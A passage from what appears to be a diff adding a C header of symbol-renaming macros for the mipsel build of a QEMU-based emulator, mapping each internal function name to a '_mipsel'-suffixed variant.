machvirt_machine_init machvirt_machine_init_mipsel +#define maj maj_mipsel +#define mapping_conflict mapping_conflict_mipsel +#define mapping_contiguous mapping_contiguous_mipsel +#define mapping_have_same_region mapping_have_same_region_mipsel +#define mapping_merge mapping_merge_mipsel +#define mem_add mem_add_mipsel +#define mem_begin mem_begin_mipsel +#define mem_commit mem_commit_mipsel +#define memory_access_is_direct memory_access_is_direct_mipsel +#define memory_access_size memory_access_size_mipsel +#define memory_init memory_init_mipsel +#define memory_listener_match memory_listener_match_mipsel +#define memory_listener_register memory_listener_register_mipsel +#define memory_listener_unregister memory_listener_unregister_mipsel +#define memory_map_init memory_map_init_mipsel +#define memory_mapping_filter memory_mapping_filter_mipsel +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_mipsel +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mipsel +#define memory_mapping_list_free memory_mapping_list_free_mipsel +#define memory_mapping_list_init memory_mapping_list_init_mipsel +#define memory_region_access_valid memory_region_access_valid_mipsel +#define memory_region_add_subregion memory_region_add_subregion_mipsel +#define memory_region_add_subregion_common memory_region_add_subregion_common_mipsel +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mipsel +#define memory_region_big_endian memory_region_big_endian_mipsel +#define memory_region_clear_pending memory_region_clear_pending_mipsel +#define memory_region_del_subregion memory_region_del_subregion_mipsel +#define memory_region_destructor_alias memory_region_destructor_alias_mipsel +#define memory_region_destructor_none memory_region_destructor_none_mipsel +#define memory_region_destructor_ram memory_region_destructor_ram_mipsel +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_mipsel +#define memory_region_dispatch_read memory_region_dispatch_read_mipsel +#define memory_region_dispatch_read1 memory_region_dispatch_read1_mipsel +#define memory_region_dispatch_write memory_region_dispatch_write_mipsel +#define memory_region_escape_name memory_region_escape_name_mipsel +#define memory_region_finalize memory_region_finalize_mipsel +#define memory_region_find memory_region_find_mipsel +#define memory_region_get_addr memory_region_get_addr_mipsel +#define memory_region_get_alignment memory_region_get_alignment_mipsel +#define memory_region_get_container memory_region_get_container_mipsel +#define memory_region_get_fd memory_region_get_fd_mipsel +#define memory_region_get_may_overlap memory_region_get_may_overlap_mipsel +#define memory_region_get_priority memory_region_get_priority_mipsel +#define memory_region_get_ram_addr memory_region_get_ram_addr_mipsel +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_mipsel +#define memory_region_get_size memory_region_get_size_mipsel +#define memory_region_info memory_region_info_mipsel +#define memory_region_init memory_region_init_mipsel +#define memory_region_init_alias memory_region_init_alias_mipsel +#define memory_region_initfn memory_region_initfn_mipsel +#define memory_region_init_io memory_region_init_io_mipsel +#define memory_region_init_ram memory_region_init_ram_mipsel +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_mipsel +#define memory_region_init_reservation memory_region_init_reservation_mipsel +#define memory_region_is_iommu memory_region_is_iommu_mipsel +#define memory_region_is_logging memory_region_is_logging_mipsel +#define memory_region_is_mapped memory_region_is_mapped_mipsel +#define memory_region_is_ram memory_region_is_ram_mipsel +#define memory_region_is_rom memory_region_is_rom_mipsel +#define memory_region_is_romd memory_region_is_romd_mipsel +#define memory_region_is_skip_dump memory_region_is_skip_dump_mipsel +#define memory_region_is_unassigned memory_region_is_unassigned_mipsel +#define memory_region_name memory_region_name_mipsel +#define memory_region_need_escape memory_region_need_escape_mipsel +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_mipsel +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_mipsel +#define memory_region_present memory_region_present_mipsel +#define memory_region_read_accessor memory_region_read_accessor_mipsel +#define memory_region_readd_subregion memory_region_readd_subregion_mipsel +#define memory_region_ref memory_region_ref_mipsel +#define memory_region_resolve_container memory_region_resolve_container_mipsel +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_mipsel +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_mipsel +#define memory_region_set_address memory_region_set_address_mipsel +#define memory_region_set_alias_offset memory_region_set_alias_offset_mipsel +#define memory_region_set_enabled memory_region_set_enabled_mipsel +#define memory_region_set_readonly memory_region_set_readonly_mipsel +#define memory_region_set_skip_dump memory_region_set_skip_dump_mipsel +#define memory_region_size memory_region_size_mipsel +#define memory_region_to_address_space memory_region_to_address_space_mipsel +#define memory_region_transaction_begin memory_region_transaction_begin_mipsel +#define memory_region_transaction_commit memory_region_transaction_commit_mipsel +#define memory_region_unref memory_region_unref_mipsel +#define memory_region_update_container_subregions memory_region_update_container_subregions_mipsel +#define memory_region_write_accessor memory_region_write_accessor_mipsel +#define memory_region_wrong_endianness memory_region_wrong_endianness_mipsel +#define memory_try_enable_merging memory_try_enable_merging_mipsel +#define module_call_init module_call_init_mipsel +#define module_load module_load_mipsel +#define mpidr_cp_reginfo mpidr_cp_reginfo_mipsel +#define mpidr_read mpidr_read_mipsel +#define msr_mask msr_mask_mipsel +#define mul128By64To192 mul128By64To192_mipsel +#define mul128To256 mul128To256_mipsel +#define mul64To128 mul64To128_mipsel +#define muldiv64 muldiv64_mipsel +#define neon_2rm_is_float_op neon_2rm_is_float_op_mipsel +#define neon_2rm_sizes neon_2rm_sizes_mipsel +#define neon_3r_sizes neon_3r_sizes_mipsel +#define neon_get_scalar neon_get_scalar_mipsel +#define neon_load_reg neon_load_reg_mipsel +#define neon_load_reg64 neon_load_reg64_mipsel +#define neon_load_scratch neon_load_scratch_mipsel +#define neon_ls_element_type neon_ls_element_type_mipsel +#define neon_reg_offset neon_reg_offset_mipsel +#define neon_store_reg neon_store_reg_mipsel +#define neon_store_reg64 neon_store_reg64_mipsel +#define neon_store_scratch neon_store_scratch_mipsel +#define new_ldst_label new_ldst_label_mipsel +#define next_list next_list_mipsel +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_mipsel +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_mipsel +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_mipsel +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_mipsel +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mipsel +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_mipsel +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_mipsel +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_mipsel +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mipsel +#define not_v6_cp_reginfo not_v6_cp_reginfo_mipsel +#define not_v7_cp_reginfo not_v7_cp_reginfo_mipsel +#define not_v8_cp_reginfo not_v8_cp_reginfo_mipsel +#define object_child_foreach object_child_foreach_mipsel +#define object_class_foreach object_class_foreach_mipsel +#define object_class_foreach_tramp object_class_foreach_tramp_mipsel +#define object_class_get_list object_class_get_list_mipsel +#define object_class_get_list_tramp object_class_get_list_tramp_mipsel +#define object_class_get_parent object_class_get_parent_mipsel +#define object_deinit object_deinit_mipsel +#define object_dynamic_cast object_dynamic_cast_mipsel +#define object_finalize object_finalize_mipsel +#define object_finalize_child_property object_finalize_child_property_mipsel +#define object_get_child_property object_get_child_property_mipsel +#define object_get_link_property object_get_link_property_mipsel +#define object_get_root object_get_root_mipsel +#define object_initialize_with_type object_initialize_with_type_mipsel +#define object_init_with_type object_init_with_type_mipsel +#define object_instance_init object_instance_init_mipsel +#define object_new_with_type object_new_with_type_mipsel +#define object_post_init_with_type object_post_init_with_type_mipsel +#define object_property_add_alias object_property_add_alias_mipsel +#define object_property_add_link object_property_add_link_mipsel +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_mipsel +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_mipsel +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_mipsel +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_mipsel +#define object_property_allow_set_link object_property_allow_set_link_mipsel +#define object_property_del object_property_del_mipsel +#define object_property_del_all object_property_del_all_mipsel +#define object_property_find object_property_find_mipsel +#define object_property_get object_property_get_mipsel +#define object_property_get_bool object_property_get_bool_mipsel +#define object_property_get_int object_property_get_int_mipsel +#define object_property_get_link object_property_get_link_mipsel +#define object_property_get_qobject object_property_get_qobject_mipsel +#define object_property_get_str object_property_get_str_mipsel +#define object_property_get_type object_property_get_type_mipsel +#define object_property_is_child object_property_is_child_mipsel +#define object_property_set object_property_set_mipsel +#define object_property_set_description object_property_set_description_mipsel +#define object_property_set_link object_property_set_link_mipsel +#define object_property_set_qobject object_property_set_qobject_mipsel +#define object_release_link_property object_release_link_property_mipsel +#define object_resolve_abs_path object_resolve_abs_path_mipsel +#define object_resolve_child_property object_resolve_child_property_mipsel +#define object_resolve_link object_resolve_link_mipsel +#define object_resolve_link_property object_resolve_link_property_mipsel +#define object_resolve_partial_path object_resolve_partial_path_mipsel +#define object_resolve_path object_resolve_path_mipsel +#define object_resolve_path_component object_resolve_path_component_mipsel +#define object_resolve_path_type object_resolve_path_type_mipsel +#define object_set_link_property object_set_link_property_mipsel +#define object_unparent object_unparent_mipsel +#define omap_cachemaint_write omap_cachemaint_write_mipsel +#define omap_cp_reginfo omap_cp_reginfo_mipsel +#define omap_threadid_write omap_threadid_write_mipsel +#define omap_ticonfig_write omap_ticonfig_write_mipsel +#define omap_wfi_write omap_wfi_write_mipsel +#define op_bits op_bits_mipsel +#define open_modeflags open_modeflags_mipsel +#define op_to_mov op_to_mov_mipsel +#define op_to_movi op_to_movi_mipsel +#define output_type_enum output_type_enum_mipsel +#define packFloat128 packFloat128_mipsel +#define packFloat16 packFloat16_mipsel +#define packFloat32 packFloat32_mipsel +#define packFloat64 packFloat64_mipsel +#define packFloatx80 packFloatx80_mipsel +#define page_find page_find_mipsel +#define page_find_alloc page_find_alloc_mipsel +#define page_flush_tb page_flush_tb_mipsel +#define page_flush_tb_1 page_flush_tb_1_mipsel +#define page_init page_init_mipsel +#define page_size_init page_size_init_mipsel +#define par par_mipsel +#define parse_array parse_array_mipsel +#define parse_error parse_error_mipsel +#define parse_escape parse_escape_mipsel +#define parse_keyword parse_keyword_mipsel +#define parse_literal parse_literal_mipsel +#define parse_object parse_object_mipsel +#define parse_optional parse_optional_mipsel +#define parse_option_bool parse_option_bool_mipsel +#define parse_option_number parse_option_number_mipsel +#define parse_option_size parse_option_size_mipsel +#define parse_pair parse_pair_mipsel +#define parser_context_free parser_context_free_mipsel +#define parser_context_new parser_context_new_mipsel +#define parser_context_peek_token parser_context_peek_token_mipsel +#define parser_context_pop_token parser_context_pop_token_mipsel +#define parser_context_restore parser_context_restore_mipsel +#define parser_context_save parser_context_save_mipsel +#define parse_str parse_str_mipsel +#define parse_type_bool parse_type_bool_mipsel +#define parse_type_int parse_type_int_mipsel +#define parse_type_number parse_type_number_mipsel +#define parse_type_size parse_type_size_mipsel +#define parse_type_str parse_type_str_mipsel +#define parse_value parse_value_mipsel +#define par_write par_write_mipsel +#define patch_reloc patch_reloc_mipsel +#define phys_map_node_alloc phys_map_node_alloc_mipsel +#define phys_map_node_reserve phys_map_node_reserve_mipsel +#define phys_mem_alloc phys_mem_alloc_mipsel +#define phys_mem_set_alloc phys_mem_set_alloc_mipsel +#define phys_page_compact phys_page_compact_mipsel +#define phys_page_compact_all phys_page_compact_all_mipsel +#define phys_page_find phys_page_find_mipsel +#define phys_page_set phys_page_set_mipsel +#define phys_page_set_level phys_page_set_level_mipsel +#define phys_section_add phys_section_add_mipsel +#define phys_section_destroy phys_section_destroy_mipsel +#define phys_sections_free phys_sections_free_mipsel +#define pickNaN pickNaN_mipsel +#define pickNaNMulAdd pickNaNMulAdd_mipsel +#define pmccfiltr_write pmccfiltr_write_mipsel +#define pmccntr_read pmccntr_read_mipsel +#define pmccntr_sync pmccntr_sync_mipsel +#define pmccntr_write pmccntr_write_mipsel +#define pmccntr_write32 pmccntr_write32_mipsel +#define pmcntenclr_write pmcntenclr_write_mipsel +#define pmcntenset_write pmcntenset_write_mipsel +#define pmcr_write pmcr_write_mipsel +#define pmintenclr_write pmintenclr_write_mipsel +#define pmintenset_write pmintenset_write_mipsel +#define pmovsr_write pmovsr_write_mipsel +#define pmreg_access pmreg_access_mipsel +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_mipsel +#define pmsav5_data_ap_read pmsav5_data_ap_read_mipsel +#define pmsav5_data_ap_write pmsav5_data_ap_write_mipsel +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_mipsel +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_mipsel +#define pmuserenr_write pmuserenr_write_mipsel +#define pmxevtyper_write pmxevtyper_write_mipsel +#define print_type_bool print_type_bool_mipsel +#define print_type_int print_type_int_mipsel +#define print_type_number print_type_number_mipsel +#define print_type_size print_type_size_mipsel +#define print_type_str print_type_str_mipsel +#define propagateFloat128NaN propagateFloat128NaN_mipsel +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_mipsel +#define propagateFloat32NaN propagateFloat32NaN_mipsel +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_mipsel +#define propagateFloat64NaN propagateFloat64NaN_mipsel +#define propagateFloatx80NaN propagateFloatx80NaN_mipsel +#define property_get_alias property_get_alias_mipsel +#define property_get_bool property_get_bool_mipsel +#define property_get_str property_get_str_mipsel +#define property_get_uint16_ptr property_get_uint16_ptr_mipsel +#define property_get_uint32_ptr property_get_uint32_ptr_mipsel +#define property_get_uint64_ptr property_get_uint64_ptr_mipsel +#define property_get_uint8_ptr property_get_uint8_ptr_mipsel +#define property_release_alias property_release_alias_mipsel +#define property_release_bool property_release_bool_mipsel +#define property_release_str property_release_str_mipsel +#define property_resolve_alias property_resolve_alias_mipsel +#define property_set_alias property_set_alias_mipsel +#define property_set_bool property_set_bool_mipsel +#define property_set_str property_set_str_mipsel +#define pstate_read pstate_read_mipsel +#define pstate_write pstate_write_mipsel +#define pxa250_initfn pxa250_initfn_mipsel +#define pxa255_initfn pxa255_initfn_mipsel +#define pxa260_initfn pxa260_initfn_mipsel +#define pxa261_initfn pxa261_initfn_mipsel +#define pxa262_initfn pxa262_initfn_mipsel +#define pxa270a0_initfn pxa270a0_initfn_mipsel +#define pxa270a1_initfn pxa270a1_initfn_mipsel +#define pxa270b0_initfn pxa270b0_initfn_mipsel +#define pxa270b1_initfn pxa270b1_initfn_mipsel +#define pxa270c0_initfn pxa270c0_initfn_mipsel +#define pxa270c5_initfn pxa270c5_initfn_mipsel +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_mipsel +#define qapi_dealloc_end_list qapi_dealloc_end_list_mipsel +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_mipsel +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_mipsel +#define qapi_dealloc_next_list qapi_dealloc_next_list_mipsel +#define qapi_dealloc_pop qapi_dealloc_pop_mipsel +#define qapi_dealloc_push qapi_dealloc_push_mipsel +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_mipsel +#define qapi_dealloc_start_list qapi_dealloc_start_list_mipsel +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_mipsel +#define qapi_dealloc_start_union qapi_dealloc_start_union_mipsel +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_mipsel +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_mipsel +#define qapi_dealloc_type_int qapi_dealloc_type_int_mipsel +#define qapi_dealloc_type_number qapi_dealloc_type_number_mipsel +#define qapi_dealloc_type_size qapi_dealloc_type_size_mipsel +#define qapi_dealloc_type_str qapi_dealloc_type_str_mipsel +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_mipsel +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_mipsel +#define qapi_free_boolList qapi_free_boolList_mipsel +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_mipsel +#define qapi_free_int16List qapi_free_int16List_mipsel +#define qapi_free_int32List qapi_free_int32List_mipsel +#define qapi_free_int64List qapi_free_int64List_mipsel +#define qapi_free_int8List qapi_free_int8List_mipsel +#define qapi_free_intList qapi_free_intList_mipsel +#define qapi_free_numberList qapi_free_numberList_mipsel +#define qapi_free_strList qapi_free_strList_mipsel +#define qapi_free_uint16List qapi_free_uint16List_mipsel +#define qapi_free_uint32List qapi_free_uint32List_mipsel +#define qapi_free_uint64List qapi_free_uint64List_mipsel +#define qapi_free_uint8List qapi_free_uint8List_mipsel +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_mipsel +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_mipsel +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_mipsel +#define qbool_destroy_obj qbool_destroy_obj_mipsel +#define qbool_from_int qbool_from_int_mipsel +#define qbool_get_int qbool_get_int_mipsel +#define qbool_type qbool_type_mipsel +#define qbus_create qbus_create_mipsel +#define qbus_create_inplace qbus_create_inplace_mipsel +#define qbus_finalize qbus_finalize_mipsel +#define qbus_initfn qbus_initfn_mipsel +#define qbus_realize qbus_realize_mipsel +#define qdev_create qdev_create_mipsel +#define qdev_get_type qdev_get_type_mipsel +#define qdev_register_types qdev_register_types_mipsel +#define qdev_set_parent_bus qdev_set_parent_bus_mipsel +#define qdev_try_create qdev_try_create_mipsel +#define qdict_add_key qdict_add_key_mipsel +#define qdict_array_split qdict_array_split_mipsel +#define qdict_clone_shallow qdict_clone_shallow_mipsel +#define qdict_del qdict_del_mipsel +#define qdict_destroy_obj qdict_destroy_obj_mipsel +#define qdict_entry_key qdict_entry_key_mipsel +#define qdict_entry_value qdict_entry_value_mipsel +#define qdict_extract_subqdict qdict_extract_subqdict_mipsel +#define qdict_find qdict_find_mipsel +#define qdict_first qdict_first_mipsel +#define qdict_flatten qdict_flatten_mipsel +#define qdict_flatten_qdict qdict_flatten_qdict_mipsel +#define qdict_flatten_qlist qdict_flatten_qlist_mipsel +#define qdict_get qdict_get_mipsel +#define qdict_get_bool qdict_get_bool_mipsel +#define qdict_get_double qdict_get_double_mipsel +#define qdict_get_int qdict_get_int_mipsel +#define qdict_get_obj qdict_get_obj_mipsel +#define qdict_get_qdict qdict_get_qdict_mipsel +#define qdict_get_qlist qdict_get_qlist_mipsel +#define qdict_get_str qdict_get_str_mipsel +#define qdict_get_try_bool qdict_get_try_bool_mipsel +#define qdict_get_try_int qdict_get_try_int_mipsel +#define qdict_get_try_str qdict_get_try_str_mipsel +#define qdict_haskey qdict_haskey_mipsel +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_mipsel +#define qdict_iter qdict_iter_mipsel +#define qdict_join qdict_join_mipsel +#define qdict_new qdict_new_mipsel +#define qdict_next qdict_next_mipsel +#define qdict_next_entry qdict_next_entry_mipsel +#define qdict_put_obj qdict_put_obj_mipsel +#define qdict_size qdict_size_mipsel +#define qdict_type qdict_type_mipsel +#define qemu_clock_get_us qemu_clock_get_us_mipsel +#define qemu_clock_ptr qemu_clock_ptr_mipsel +#define qemu_clocks qemu_clocks_mipsel +#define qemu_get_cpu qemu_get_cpu_mipsel +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_mipsel +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_mipsel +#define qemu_get_ram_block qemu_get_ram_block_mipsel +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_mipsel +#define qemu_get_ram_fd qemu_get_ram_fd_mipsel +#define qemu_get_ram_ptr qemu_get_ram_ptr_mipsel +#define qemu_host_page_mask qemu_host_page_mask_mipsel +#define qemu_host_page_size qemu_host_page_size_mipsel +#define qemu_init_vcpu qemu_init_vcpu_mipsel +#define qemu_ld_helpers qemu_ld_helpers_mipsel +#define qemu_log_close qemu_log_close_mipsel +#define qemu_log_enabled qemu_log_enabled_mipsel +#define qemu_log_flush qemu_log_flush_mipsel +#define qemu_loglevel_mask qemu_loglevel_mask_mipsel +#define qemu_log_vprintf qemu_log_vprintf_mipsel +#define qemu_oom_check qemu_oom_check_mipsel +#define qemu_parse_fd qemu_parse_fd_mipsel +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_mipsel +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_mipsel +#define qemu_ram_alloc qemu_ram_alloc_mipsel +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mipsel +#define qemu_ram_foreach_block qemu_ram_foreach_block_mipsel +#define qemu_ram_free qemu_ram_free_mipsel +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_mipsel +#define qemu_ram_ptr_length qemu_ram_ptr_length_mipsel +#define qemu_ram_remap qemu_ram_remap_mipsel +#define qemu_ram_setup_dump qemu_ram_setup_dump_mipsel +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_mipsel +#define qemu_real_host_page_size qemu_real_host_page_size_mipsel +#define qemu_st_helpers qemu_st_helpers_mipsel +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_mipsel +#define qemu_try_memalign qemu_try_memalign_mipsel +#define qentry_destroy qentry_destroy_mipsel +#define qerror_human qerror_human_mipsel +#define qerror_report qerror_report_mipsel +#define qerror_report_err qerror_report_err_mipsel +#define qfloat_destroy_obj qfloat_destroy_obj_mipsel +#define qfloat_from_double qfloat_from_double_mipsel +#define qfloat_get_double qfloat_get_double_mipsel +#define qfloat_type qfloat_type_mipsel +#define qint_destroy_obj qint_destroy_obj_mipsel +#define qint_from_int qint_from_int_mipsel +#define qint_get_int qint_get_int_mipsel +#define qint_type qint_type_mipsel +#define qlist_append_obj qlist_append_obj_mipsel +#define qlist_copy qlist_copy_mipsel +#define qlist_copy_elem qlist_copy_elem_mipsel +#define qlist_destroy_obj qlist_destroy_obj_mipsel +#define qlist_empty qlist_empty_mipsel +#define qlist_entry_obj qlist_entry_obj_mipsel +#define qlist_first qlist_first_mipsel +#define qlist_iter qlist_iter_mipsel +#define qlist_new qlist_new_mipsel +#define qlist_next qlist_next_mipsel +#define qlist_peek qlist_peek_mipsel +#define qlist_pop qlist_pop_mipsel +#define qlist_size qlist_size_mipsel +#define qlist_size_iter qlist_size_iter_mipsel +#define qlist_type qlist_type_mipsel +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_mipsel +#define qmp_input_end_list qmp_input_end_list_mipsel +#define qmp_input_end_struct qmp_input_end_struct_mipsel +#define qmp_input_get_next_type qmp_input_get_next_type_mipsel +#define qmp_input_get_object qmp_input_get_object_mipsel +#define qmp_input_get_visitor qmp_input_get_visitor_mipsel +#define qmp_input_next_list qmp_input_next_list_mipsel +#define qmp_input_optional qmp_input_optional_mipsel +#define qmp_input_pop qmp_input_pop_mipsel +#define qmp_input_push qmp_input_push_mipsel +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_mipsel +#define qmp_input_start_list qmp_input_start_list_mipsel +#define qmp_input_start_struct qmp_input_start_struct_mipsel +#define qmp_input_type_bool qmp_input_type_bool_mipsel +#define qmp_input_type_int qmp_input_type_int_mipsel +#define qmp_input_type_number qmp_input_type_number_mipsel +#define qmp_input_type_str qmp_input_type_str_mipsel +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_mipsel +#define qmp_input_visitor_new qmp_input_visitor_new_mipsel +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_mipsel +#define qmp_output_add_obj qmp_output_add_obj_mipsel +#define qmp_output_end_list qmp_output_end_list_mipsel +#define qmp_output_end_struct qmp_output_end_struct_mipsel +#define qmp_output_first qmp_output_first_mipsel +#define qmp_output_get_qobject qmp_output_get_qobject_mipsel +#define qmp_output_get_visitor qmp_output_get_visitor_mipsel +#define qmp_output_last qmp_output_last_mipsel +#define qmp_output_next_list qmp_output_next_list_mipsel +#define qmp_output_pop qmp_output_pop_mipsel +#define qmp_output_push_obj qmp_output_push_obj_mipsel +#define qmp_output_start_list qmp_output_start_list_mipsel +#define qmp_output_start_struct qmp_output_start_struct_mipsel +#define qmp_output_type_bool qmp_output_type_bool_mipsel +#define qmp_output_type_int qmp_output_type_int_mipsel +#define qmp_output_type_number qmp_output_type_number_mipsel +#define qmp_output_type_str qmp_output_type_str_mipsel +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_mipsel +#define qmp_output_visitor_new qmp_output_visitor_new_mipsel +#define qobject_decref qobject_decref_mipsel +#define qobject_to_qbool qobject_to_qbool_mipsel +#define qobject_to_qdict qobject_to_qdict_mipsel +#define qobject_to_qfloat qobject_to_qfloat_mipsel +#define qobject_to_qint qobject_to_qint_mipsel +#define qobject_to_qlist qobject_to_qlist_mipsel +#define qobject_to_qstring qobject_to_qstring_mipsel +#define qobject_type qobject_type_mipsel +#define qstring_append qstring_append_mipsel +#define qstring_append_chr qstring_append_chr_mipsel +#define qstring_append_int qstring_append_int_mipsel +#define qstring_destroy_obj qstring_destroy_obj_mipsel +#define qstring_from_escaped_str qstring_from_escaped_str_mipsel +#define qstring_from_str qstring_from_str_mipsel +#define qstring_from_substr qstring_from_substr_mipsel +#define qstring_get_length qstring_get_length_mipsel +#define qstring_get_str qstring_get_str_mipsel +#define qstring_new qstring_new_mipsel +#define qstring_type qstring_type_mipsel +#define ram_block_add ram_block_add_mipsel +#define ram_size ram_size_mipsel +#define range_compare range_compare_mipsel +#define range_covers_byte range_covers_byte_mipsel +#define range_get_last range_get_last_mipsel +#define range_merge range_merge_mipsel +#define ranges_can_merge ranges_can_merge_mipsel +#define raw_read raw_read_mipsel +#define raw_write raw_write_mipsel +#define rcon rcon_mipsel +#define read_raw_cp_reg read_raw_cp_reg_mipsel +#define recip_estimate recip_estimate_mipsel +#define recip_sqrt_estimate recip_sqrt_estimate_mipsel +#define register_cp_regs_for_features register_cp_regs_for_features_mipsel +#define register_multipage register_multipage_mipsel +#define register_subpage register_subpage_mipsel +#define register_tm_clones register_tm_clones_mipsel +#define register_types_object register_types_object_mipsel +#define regnames regnames_mipsel +#define render_memory_region render_memory_region_mipsel +#define reset_all_temps reset_all_temps_mipsel +#define reset_temp reset_temp_mipsel +#define rol32 rol32_mipsel +#define rol64 rol64_mipsel +#define ror32 ror32_mipsel +#define ror64 ror64_mipsel +#define roundAndPackFloat128 roundAndPackFloat128_mipsel +#define roundAndPackFloat16 roundAndPackFloat16_mipsel +#define roundAndPackFloat32 roundAndPackFloat32_mipsel +#define roundAndPackFloat64 roundAndPackFloat64_mipsel +#define roundAndPackFloatx80 roundAndPackFloatx80_mipsel +#define roundAndPackInt32 roundAndPackInt32_mipsel +#define roundAndPackInt64 roundAndPackInt64_mipsel +#define roundAndPackUint64 roundAndPackUint64_mipsel +#define round_to_inf round_to_inf_mipsel +#define run_on_cpu run_on_cpu_mipsel +#define s0 s0_mipsel +#define S0 S0_mipsel +#define s1 s1_mipsel +#define S1 S1_mipsel +#define sa1100_initfn sa1100_initfn_mipsel +#define sa1110_initfn sa1110_initfn_mipsel +#define save_globals save_globals_mipsel +#define scr_write scr_write_mipsel +#define sctlr_write sctlr_write_mipsel +#define set_bit set_bit_mipsel +#define set_bits set_bits_mipsel +#define set_default_nan_mode set_default_nan_mode_mipsel +#define set_feature set_feature_mipsel +#define set_float_detect_tininess set_float_detect_tininess_mipsel +#define set_float_exception_flags set_float_exception_flags_mipsel +#define set_float_rounding_mode set_float_rounding_mode_mipsel +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_mipsel +#define set_flush_to_zero set_flush_to_zero_mipsel +#define set_swi_errno set_swi_errno_mipsel +#define sextract32 sextract32_mipsel +#define sextract64 sextract64_mipsel +#define shift128ExtraRightJamming shift128ExtraRightJamming_mipsel +#define shift128Right shift128Right_mipsel +#define shift128RightJamming shift128RightJamming_mipsel +#define shift32RightJamming shift32RightJamming_mipsel +#define shift64ExtraRightJamming shift64ExtraRightJamming_mipsel +#define shift64RightJamming shift64RightJamming_mipsel +#define shifter_out_im shifter_out_im_mipsel +#define shortShift128Left shortShift128Left_mipsel +#define shortShift192Left shortShift192Left_mipsel +#define simple_mpu_ap_bits simple_mpu_ap_bits_mipsel +#define size_code_gen_buffer size_code_gen_buffer_mipsel +#define softmmu_lock_user softmmu_lock_user_mipsel +#define softmmu_lock_user_string softmmu_lock_user_string_mipsel +#define softmmu_tget32 softmmu_tget32_mipsel +#define softmmu_tget8 softmmu_tget8_mipsel +#define softmmu_tput32 softmmu_tput32_mipsel +#define softmmu_unlock_user softmmu_unlock_user_mipsel +#define sort_constraints sort_constraints_mipsel +#define sp_el0_access sp_el0_access_mipsel +#define spsel_read spsel_read_mipsel +#define spsel_write spsel_write_mipsel +#define start_list start_list_mipsel +#define stb_p stb_p_mipsel +#define stb_phys stb_phys_mipsel +#define stl_be_p stl_be_p_mipsel +#define stl_be_phys stl_be_phys_mipsel +#define stl_he_p stl_he_p_mipsel +#define stl_le_p stl_le_p_mipsel +#define stl_le_phys stl_le_phys_mipsel +#define stl_phys stl_phys_mipsel +#define stl_phys_internal stl_phys_internal_mipsel +#define stl_phys_notdirty stl_phys_notdirty_mipsel +#define store_cpu_offset store_cpu_offset_mipsel +#define store_reg store_reg_mipsel +#define store_reg_bx store_reg_bx_mipsel +#define store_reg_from_load store_reg_from_load_mipsel +#define stq_be_p stq_be_p_mipsel +#define stq_be_phys stq_be_phys_mipsel +#define stq_he_p stq_he_p_mipsel +#define stq_le_p stq_le_p_mipsel +#define stq_le_phys stq_le_phys_mipsel +#define stq_phys stq_phys_mipsel +#define string_input_get_visitor string_input_get_visitor_mipsel +#define string_input_visitor_cleanup string_input_visitor_cleanup_mipsel +#define string_input_visitor_new string_input_visitor_new_mipsel +#define strongarm_cp_reginfo strongarm_cp_reginfo_mipsel +#define strstart strstart_mipsel +#define strtosz strtosz_mipsel +#define strtosz_suffix strtosz_suffix_mipsel +#define stw_be_p stw_be_p_mipsel +#define stw_be_phys 